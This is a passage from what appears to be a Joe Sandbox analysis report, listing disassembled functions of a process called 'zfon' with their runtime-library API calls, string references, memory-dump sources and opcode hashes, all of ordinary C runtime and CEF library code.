                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE72
                                                                                                  • Part of subcall function 00007FF8B90EB690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6B2
                                                                                                  • Part of subcall function 00007FF8B90EB690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6D8
                                                                                                  • Part of subcall function 00007FF8B90EB690: memcpy.VCRUNTIME140(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6F0
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B910FEAE
                                                                                                  • Part of subcall function 00007FF8B9116410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9116419
                                                                                                  • Part of subcall function 00007FF8B9116410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B912CAF9,?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B911642A
                                                                                                Strings
                                                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF8B910FD9E
                                                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FF8B910FE1C
                                                                                                • :AM:am:PM:pm, xrefs: 00007FF8B910FE68
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: callocfree$Concurrency::cancel_current_taskExceptionGetdaysGetmonthsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpystd::bad_alloc::bad_alloc
                                                                                                • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                • API String ID: 1633071956-35662545
                                                                                                • Opcode ID: c96668183701c6eda3072c66f0e30224a7173cc72ed510ee49ab9830892cee25
                                                                                                • Instruction ID: 0b05f6547cba95b168bc0006ed5007c14b8ef9bf9b04bf43398afd7207229c9d
                                                                                                • Opcode Fuzzy Hash: c96668183701c6eda3072c66f0e30224a7173cc72ed510ee49ab9830892cee25
                                                                                                • Instruction Fuzzy Hash: EC41CE62B09BC196EB118F29A9097A86BA1FB48FD0F598274DF5D07395EF3CE445C340
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$free$memcpy$cef_string_map_allocmallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 871575421-0
                                                                                                • Opcode ID: 11148d5f20730535a912effe85e7e352052db1356c55129a3d8f9a4ea7c9409b
                                                                                                • Instruction ID: 7d2784b025fcd6e66242c1e2fc2fbb28b7a9d29f972899b4123fd8367131f094
                                                                                                • Opcode Fuzzy Hash: 11148d5f20730535a912effe85e7e352052db1356c55129a3d8f9a4ea7c9409b
                                                                                                • Instruction Fuzzy Hash: 14D17A62B09A4585EF14EF65D8443ACA3B2EB44BDCF848536CE2D537E8EF28D445C3A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$__strncntfreemalloc$CompareInfoString__crt
                                                                                                • String ID:
                                                                                                • API String ID: 1548350897-0
                                                                                                • Opcode ID: 86e6458747dd585bbaca4ee4a0804712e124df9f5143478126bb692e17416477
                                                                                                • Instruction ID: f5443c0196322fb56adb43b82f8d50fc81350934525b69a360786bbba8bfdc46
                                                                                                • Opcode Fuzzy Hash: 86e6458747dd585bbaca4ee4a0804712e124df9f5143478126bb692e17416477
                                                                                                • Instruction Fuzzy Hash: E3919EB2E08AC296EF318F6D94507B976A1AF44BE4F584632DB7D067C6DE2CE5468300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3856544966-0
                                                                                                • Opcode ID: 83a0e9b01bca61e18e723a4362523cdaa063e4ca77d1efefa51ebefaf1cf5d36
                                                                                                • Instruction ID: 9773da3f931f8b8181232f486ea23f6350196184dd451ae88b29e2b9ef15a879
                                                                                                • Opcode Fuzzy Hash: 83a0e9b01bca61e18e723a4362523cdaa063e4ca77d1efefa51ebefaf1cf5d36
                                                                                                • Instruction Fuzzy Hash: FD91BF32B09B4699EB14EF65D8443BDA3B2AB49B98F844431CA2D077D8EF3CD445C3A0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                • String ID: csm$csm$csm
                                                                                                • API String ID: 4223619315-393685449
                                                                                                • Opcode ID: 136ccb217c6342170b2e40de9bcc27d78e98e413111f3fdb98d74605d14dd66b
                                                                                                • Instruction ID: f71b7b6941b74bddbb73dadfca53ae3bc464871f2cab0d673a0c9f449b6958e8
                                                                                                • Opcode Fuzzy Hash: 136ccb217c6342170b2e40de9bcc27d78e98e413111f3fdb98d74605d14dd66b
                                                                                                • Instruction Fuzzy Hash: F3D16B73A087418AEB609BA9D4602AD77A1FB45BC8F540139EF8D57B95DF3CE0A1C700
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Replicator::operator[]
                                                                                                • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                • API String ID: 3676697650-3207858774
                                                                                                • Opcode ID: d6d96e58e56aecf7a62acf838a8154a9c3b739b48ea3dca409ea4180aa86bfee
                                                                                                • Instruction ID: 2bef2af664398d10e22549bea3a68b552e6555d3568c9de7a30115582c79140e
                                                                                                • Opcode Fuzzy Hash: d6d96e58e56aecf7a62acf838a8154a9c3b739b48ea3dca409ea4180aa86bfee
                                                                                                • Instruction Fuzzy Hash: 13917C22B18A86A9FB609FA8D4602BC77A1AF587C8F984132EB4D03795DF3CF545C750
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B90FC2F5
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90FC312
                                                                                                • _Maklocstr.LIBCPMT ref: 00007FF8B90FC32E
                                                                                                • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B90FC337
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90FC354
                                                                                                • _Maklocstr.LIBCPMT ref: 00007FF8B90FC370
                                                                                                • _Maklocstr.LIBCPMT ref: 00007FF8B90FC385
                                                                                                  • Part of subcall function 00007FF8B90EB690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6B2
                                                                                                  • Part of subcall function 00007FF8B90EB690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6D8
                                                                                                  • Part of subcall function 00007FF8B90EB690: memcpy.VCRUNTIME140(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6F0
                                                                                                Strings
                                                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF8B90FC31D
                                                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FF8B90FC35F
                                                                                                • :AM:am:PM:pm, xrefs: 00007FF8B90FC37E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Maklocstrfree$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
                                                                                                • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                • API String ID: 2460671452-35662545
                                                                                                • Opcode ID: 0820c1a4a04c52d0eb239fbab98a74cf88671c412056eb74643d8d24ad950682
                                                                                                • Instruction ID: 0a10358e2703d7641f789e8ccffb16aa144daec9f28efddf4113fe130d1abde0
                                                                                                • Opcode Fuzzy Hash: 0820c1a4a04c52d0eb239fbab98a74cf88671c412056eb74643d8d24ad950682
                                                                                                • Instruction Fuzzy Hash: BD214F22A08B8182EB00DF29E4412A877A1FF98FC4F448535DB4D57756EF3CE586C380
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$cef_string_map_allocmallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 940974311-0
                                                                                                • Opcode ID: 33a35221359f596db583780524ca83e01fac178137d3890bcdf752d64281db90
                                                                                                • Instruction ID: f897b5a79c60c2c08dab6ba0d3778919d151b330f7079f4989ceaa22fca1d1f1
                                                                                                • Opcode Fuzzy Hash: 33a35221359f596db583780524ca83e01fac178137d3890bcdf752d64281db90
                                                                                                • Instruction Fuzzy Hash: C3A16062B04B4585EF14EF65D8583AC63B2EB85BD8F848535CE2E17BD8EE28D445C3A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$free$memcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 1019560052-0
                                                                                                • Opcode ID: 1f5262a16c04021e3a90f13f385dbb394579881b511105779db3e6e7012f87b8
                                                                                                • Instruction ID: 3c574df74db5869409f6c20cac53ab41bc55ab1f0eeb7d0add516ef71f339b63
                                                                                                • Opcode Fuzzy Hash: 1f5262a16c04021e3a90f13f385dbb394579881b511105779db3e6e7012f87b8
                                                                                                • Instruction Fuzzy Hash: 2981C262B04B4585EF14EF65D8543ACA3B2EB85BE8F448635CE3E17BDDEE28D4418350
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharCompareMultiStringWide__crt$freemalloc$__strncnt
                                                                                                • String ID:
                                                                                                • API String ID: 525835285-0
                                                                                                • Opcode ID: f6e00a47ca206d7a4e1b7c1a66c0737e84cf9e0c9f132774600d41b7bf988ede
                                                                                                • Instruction ID: 6a6c79c9d18bc63fc8a43960feb49ab21201abfd6b4d69c785f6981ca7bec5b0
                                                                                                • Opcode Fuzzy Hash: f6e00a47ca206d7a4e1b7c1a66c0737e84cf9e0c9f132774600d41b7bf988ede
                                                                                                • Instruction Fuzzy Hash: B3716C72F08B8286EF248F2D9840269B2E1FB45BE8F544635DB7D46BD6DF3CE4468200
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID:
                                                                                                • API String ID: 2943138195-0
                                                                                                • Opcode ID: 7b5661194ffe89ce305229f5119f63caed1cb30a475ffb1c0b7852583c735bf0
                                                                                                • Instruction ID: 0a09b33bc68bcc8d1477e55cb03ff0257a57d8fab321dc2c8f8475376397bd22
                                                                                                • Opcode Fuzzy Hash: 7b5661194ffe89ce305229f5119f63caed1cb30a475ffb1c0b7852583c735bf0
                                                                                                • Instruction Fuzzy Hash: 7E711B72B05A46A9FB11DFA9D4601EC33B1AB4478CB804432DF0D57A99DF38E619C390
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2003779279-1866435925
                                                                                                • Opcode ID: 5079871919eeef31b104849c91ea34eddbb498ae389773a60f034b0124e3a6ee
                                                                                                • Instruction ID: 2194763111a59a687ccfe669ce5e101fcf3c69eba83c02d6694fdb12a7fb8230
                                                                                                • Opcode Fuzzy Hash: 5079871919eeef31b104849c91ea34eddbb498ae389773a60f034b0124e3a6ee
                                                                                                • Instruction Fuzzy Hash: 89918862A08A8691EF649F1DD4813BC3761FB84BC4F548036CB5E977A4EF2DE986D300
                                                                                                APIs
                                                                                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FF8B90E62F5), ref: 00007FF8B90E68F7
                                                                                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FF8B90E62F5), ref: 00007FF8B90E698F
                                                                                                • memchr.VCRUNTIME140(?,?,?,?,?,?,00007FF8B90E62F5), ref: 00007FF8B90E69A1
                                                                                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00007FF8B90E62F5), ref: 00007FF8B90E69D6
                                                                                                • memchr.VCRUNTIME140(?,?,?,?,?,?,00007FF8B90E62F5), ref: 00007FF8B90E69E4
                                                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00007FF8B90E62F5), ref: 00007FF8B90E6A4C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memchrtolower$_errnoisspace
                                                                                                • String ID: 0$0$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                • API String ID: 3508154992-2432849056
                                                                                                • Opcode ID: 52be6e07b037d6f09550230747a39371e924b433e1c7da1dee62df230f17126e
                                                                                                • Instruction ID: 61cc54c82ec4fe8cb18fefd7531b555805585e6d6cbfe7aa2531408493e6a026
                                                                                                • Opcode Fuzzy Hash: 52be6e07b037d6f09550230747a39371e924b433e1c7da1dee62df230f17126e
                                                                                                • Instruction Fuzzy Hash: 2F51C022E0DBC645EB229E2CF85037D7AE4AB45BD8F189031CBAD42395DE3CE8478700
                                                                                                APIs
                                                                                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00007FF8B90E6675), ref: 00007FF8B90E6ADC
                                                                                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00007FF8B90E6675), ref: 00007FF8B90E6B76
                                                                                                • memchr.VCRUNTIME140(?,?,?,?,?,00007FF8B90E6675), ref: 00007FF8B90E6B88
                                                                                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00007FF8B90E6675), ref: 00007FF8B90E6BBB
                                                                                                • memchr.VCRUNTIME140(?,?,?,?,?,00007FF8B90E6675), ref: 00007FF8B90E6BC9
